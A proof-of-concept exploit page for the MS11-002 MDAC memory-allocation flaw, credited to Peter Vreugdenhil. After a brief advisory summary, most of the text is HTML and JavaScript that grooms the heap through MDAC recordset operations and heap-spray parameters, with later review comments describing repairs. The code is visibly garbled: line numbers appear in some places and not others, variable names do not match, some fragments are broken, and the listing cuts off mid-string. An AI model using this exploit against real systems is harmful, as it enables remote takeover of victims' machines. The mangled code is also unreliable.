Microsoft Data Access Components (MDAC, MS11-002): a remote code execution vulnerability exists in the way MDAC validates memory allocations. The vulnerability can be triggered when a user opens a specially crafted web page. If the user is logged on with administrative user rights, an attacker who successfully exploits this vulnerability could take complete control of the affected system.
[+] Info:
~~~~~~~~~
Microsoft Data Access Components Vulnerability
Author: Peter Vreugdenhil
[+] Poc:
~~~~~~~~~
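<meta name="License" content="Q Public License; http://en.wikipedia.org/wiki/Q_Public_License">
<style>
  /* Both rules are empty in the listing as published; nothing was dropped here. */
  body {
  }
  /* The scraped copy read "# test" — a space after "#" is not a valid ID
     selector, so it is restored to "#test". No element with that id is
     visible in this excerpt. */
  #test {
  }
</style>
<!-- heapLib.js is a separate script the PoC depends on; it must be served
     next to this page. The scraped copy had a stray space in the filename
     ("heapLib. js"), which would have requested the wrong URL. -->
<script src="heapLib.js"></script>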
013 <script>
// This code has been released under the Q Public License by Trolltech
// http://en.wikipedia.org/wiki/Q_Public_License
// Source: http://vreugdenhilresearch.nl/ms11-002-pwn2own-heap-overflow/
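// --- PoC tuning parameters and shared state ---------------------------------
// NOTE(review): the scraped listing had a line-number gutter fused into every
// line; it has been stripped here. No value was changed, except that one
// initializer was visibly lost in extraction (see finalspray below).

var StartTime = new Date();          // wall-clock start; presumably used for timing — not visible in this excerpt

var FinalHeapSpraySize = 900;        // target size for the final heap spray (unit not shown in this excerpt)
// var SmallHoleSize = 0x1F0;        // earlier experimental value, kept from the original
var SmallHoleSize = 0x240;           // size of the small hole; assigned to a recordset's cachesize in FaseOne()
var GlobalRowCounter = 0;

// Recordset handles; resolved in FaseOne() from the page's XML data islands.
var localxmlid1;
var localxmlid2;
var localxmlid3;
var localxm1_5;

var adobase = 0;                     // presumably a resolved base address; set outside this excerpt — TODO confirm
// The scraped copy read `var finalspray =;` — the initializer was lost in
// extraction. Declared without a value so the script parses; recover the
// real value from the source URL in the header comment above.
var finalspray;
var heap = null;                     // presumably the heapLib.js heap object; assigned outside this excerpt
var ExpoitTime = 10;                 // (sic) name kept unchanged in case it is referenced elsewhere in the script
var CurrentHeapSpraySize = 0;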
/**
 * Entry point of the PoC. Presumably invoked by the page (onload or a
 * button) — the trigger is not visible in this excerpt.
 *
 * Does nothing itself except hand off to the first phase, FaseOne(), which
 * resolves the recordsets and begins the heap layout.
 */
function Start() {
    FaseOne();
}
042 function FaseOne (){
044 localxmlid1 = document. getElementById (xmlid1). recordset;
045 localxmlid2 = document. getElementById (xmlid2). recordset;
046 localxmlid3 = document. getElementById (xmlid3). recordset;
047 localxm1_5 = document. getElementById (xm1_5). recordset;
049 localxm1_2.cachesize = 0x40000358;
051 localxm1_1.cachesize = SmallHoleSize; // small hole?
052 localxm1_1.addnew (["aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa "], [" c "]);
053 localxm1_5.addnew (["bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
Bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb "], [" c "]);
056 var my1field = localxm1_5.fields. Item (0 );
057 localxm1_1.movefirst ();
059 localxm1_2.addnew (["BBBB"], ["c"]);
061 localxm1_1.close ();
062 CollectGarbage ();
064 localxm1_3.movefirst ();
066 void (Math. atan2 (0 xbabe, (###################### 2 Move First ). toString ()));
067 localxm1_2.movefirst ();
069 void (Math. atan2 (0 xbabe, (###################### 5 Move First ). toString ()));
070 localxm1_5.cachesize = 0x40000008;
071 localxm1_5.movefirst ();
072 localxm1_3.addnew (["MyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLong
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
LongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeL
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
DataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLong "], [" Hangzhou "]);
074 var localxm1_4 = document. getElementById (xm1_4). recordset;
076 localxm00004.addnew (["bb"], ["c"]);
078 localxmlid4.MoveNext ();
081 var localxm1_6 = document. getElementById (xm1_6). recordset;
082 localxmlid6.AddNew (["cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc
Ccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc
Ccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc
Cccccccccccccccccccccccccccccccccccccccccccccccccccccccc